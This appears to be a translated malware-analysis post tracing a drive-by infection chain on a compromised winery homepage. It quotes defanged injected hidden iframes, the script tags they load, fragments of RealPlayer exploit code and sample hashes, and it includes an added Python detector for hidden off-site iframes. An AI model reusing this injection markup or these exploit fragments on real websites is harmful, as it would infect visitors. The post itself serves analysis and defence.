A "god wine" company website in Bama is infected with Worm.Win32.Downloader / Trojan.Win32.Mnless
Endurer, original
Version 1
Inspecting the homepage source shows that the following code has been appended several times:
/---
<iframe src=hxxp://a**a.ll*sging**.com/ww/new05.htm?075 width=1 name='000000' height=1></iframe>
<iframe src=hxxp://a**a.ll*sging**.com/ww/new05.htm?013 width=1 height=1></iframe>
<iframe src=hxxp://www.f**oafa**u.info/ms30.htm?823 width=1 name='000000' height=1></iframe><iframe src=hxxp://a**.ll*sging**.com/ww/new05.htm?075 width=1 name='000000' height=1></iframe>
---/
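The check behind this first step, as an added example that is not part of the original post: scan a page's HTML for iframes sized to be invisible (1 pixel or less in either dimension) that load from a host other than the page's own. The sample page and the hostnames in it are constructed placeholders, not the defanged addresses above.

```python
# Added example (not from the original post): flag <iframe> tags that are sized
# to be invisible and load from a host other than the page's own. Sample HTML
# and hostnames below are constructed placeholders.
from html.parser import HTMLParser
from urllib.parse import urlparse


def _size(value):
    """Numeric part of a width/height attribute; a missing size counts as visible."""
    digits = "".join(ch for ch in (value or "") if ch.isdigit())
    return int(digits) if digits else 10**6


class HiddenIframeFinder(HTMLParser):
    """Collect iframes at most 1px in width or height whose src points off-site.
    A relative src (no host) is treated as the page's own host."""

    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # html.parser lowercases tag and attribute names
            return
        a = dict(attrs)
        host = (urlparse(a.get("src") or "").hostname or self.own_host).lower()
        hidden = min(_size(a.get("width")), _size(a.get("height"))) <= 1
        if hidden and host != self.own_host:
            self.hits.append({"src": a.get("src"), "host": host, "name": a.get("name")})


def find_hidden_iframes(html, own_host):
    """Return suspicious iframes found in `html` for a page served from `own_host`."""
    finder = HiddenIframeFinder(own_host)
    finder.feed(html)
    return finder.hits


# Constructed sample: an injected 1x1 off-site frame (as on the compromised
# homepage), an ordinary ad frame, and a tiny but same-origin frame.
SAMPLE_PAGE = """<html><body><p>Welcome</p>
<iframe src=hxxp://evil.example/ww/new05.htm?075 width=1 name='000000' height=1></iframe>
<iframe src="hxxp://partner.example/ad.htm" width="300" height="250"></iframe>
<iframe src="88/881.htm" width="20" height="0" frameborder="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE, "winery.example"):
        print("hidden off-site iframe:", hit["src"], "->", hit["host"])
```

Run it over a saved copy of the homepage with the site's own hostname; only the injected off-site frames are reported, while same-origin frames and normally sized embeds are not.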
hxxp://a**a.ll*sging**.com/ww/new05.htm?075 contains the code:
/---
<iframe src=hxxp://a**a.ll*sging**.com/AA/haha.htm width=5 height=5></iframe>
<iframe src=hxxp://a**a.ll*sging**.com/AA/gege.htm width=5 height=5></iframe>
---/
hxxp://a**a.ll*sging**.com/ww/new05.htm?013 is the same as hxxp://a**a.ll*sging**.com/ww/new05.htm?075.
hxxp://a**a.ll*sging**.com/AA/haha.htm is decrypted twice to obtain the original code. Its function is to check the cookie variable OK and then output the code:
/---
<script src=hxxp://aa.ll*sging**.com/AA/11.js></script>
<script src=hxxp://aa.ll*sging**.com/AA/BB.js></script>
<iframe width='10' height='10' src='hxxp://a**.ll*sging**.com/AA/bf.html'></iframe>
---/
This uses the Storm Player (Baofeng) vulnerability and the BaiduBar.Tool control to download hxxp://down.ll*sging**.com/BB/Bd.Cab:
File: D:/test/Bd.Cab
Attributes: ---
An error occurred while obtaining the file version information!
Creation time: 23:45:22
Modification time: 23:45:30
Access time:
Size: 34045 bytes (33.253 KB)
MD5: 67e8a38e7570de02ec1e3b0fec7ac9d9
SHA1: 9ef39949c850cfe8c03f76fa0dfc7ec3bd286254
CRC32: 888380b0
File: D:/test/bd.exe
Attributes: ---
An error occurred while obtaining the file version information!
Creation time:
Modification time:
Access time:
Size: 34837 bytes (34.21 KB)
MD5: 865188f4f8583f4c0728553b04375261
SHA1: bf3b97ae81f49caf96268ef4cff5b96c18eb88
CRC32: deed8b5c
Kaspersky reports Worm.Win32.Downloader.bi.
Rising reports Trojan.Win32.Mnless.znc (NSPack).
hxxp://a**.ll*sging**.com/AA/11.js is decrypted once to obtain the original code. Its function is to download hxxp://down.ll*sging**.com/BB/014.exe, save it as ntuser.com, and run it.
File: D:/test/014.exe
Attributes: ---
An error occurred while obtaining the file version information!
Creation time: 23:42:45
Modification time: 23:42:46
Access time:
Size: 34854 bytes (34.38 KB)
MD5: 19a5e9859be41540446fd3d7b6533d23
SHA1: 5b3a4028a4e85422acaa3f7f974ecbb5d35e936b
CRC32: 57901cec
Kaspersky reports Worm.Win32.Downloader.bd.
Rising reports Backdoor.Win32.Agent.yos (NSPack).
hxxp://a**a.ll*sging**.com/AA/BB.js is the code that exploits the Storm Player (Baofeng) audio/video vulnerability.
hxxp://a**a.ll*sging**.com/AA/PPP.js is the code that exploits the PPStream vulnerability.
hxxp://a**a.ll*sging**.com/AA/bf.html is the code for the stack overflow vulnerability in the Lianzhong ConnectAndEnterRoom ActiveX control.
Reference:
Lianzhong ConnectAndEnterRoom ActiveX Control Stack Overflow Vulnerability
http://www.nsfocus.net/vulndb/11122
hxxp://a**a.ll*sging**.com/AA/gege.htm is decrypted twice to obtain the original code. The code used for the RealPlayer vulnerability is interesting:
/---
payload += "yuange"; real.Import("C:\Program Files\netmeeting\testsnd.wav", payload, "",)}; realexploit();)
---/
hxxp://www.f**oafa**u.info/ms30.htm?823 contains the code:
/---
<html>
<iframe src="88/881.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="88/883.htm" width="1" height="1" frameborder="0"></iframe>
</html>
---/
hxxp://www.f**oafa**u.info/88/881.htm exploits MS06-014 (the msadco RDS.Dataspace control) to download hxxp://www.*6*8y**u*.cn/68down.exe, save it as C:/Microsoft.PIF, and start it by creating the file C:/Microsoft.vbs. The code contains a variable named qq784378237.
File: D:/test/68down.exe
Attributes: ---
An error occurred while obtaining the file version information!
Creation time:
Modification time:
Access time:
Size: 31876 bytes (31.132 KB)
MD5: 7f29c1dbaae355933130030aed699672
SHA1: 1a5ede06b6ccd19bb7fb9af3e9b0456e847bfdd0
CRC32: 2738d5ad
Kaspersky reports Worm.Win32.Downloader.cg.
Rising reports Trojan.Win32.Mnless.zyt.
hxxp://www.f**oafa**u.info/88/883.htm is decrypted twice to obtain the original code, which also targets the RealPlayer vulnerability. Its final part differs from the code above:
/---
payload += "chuizi ";
real.Import("C:\\Program Files\netmeeting\testsnd.wav", payload, "", 0, 0);
}
realexploit();)
---/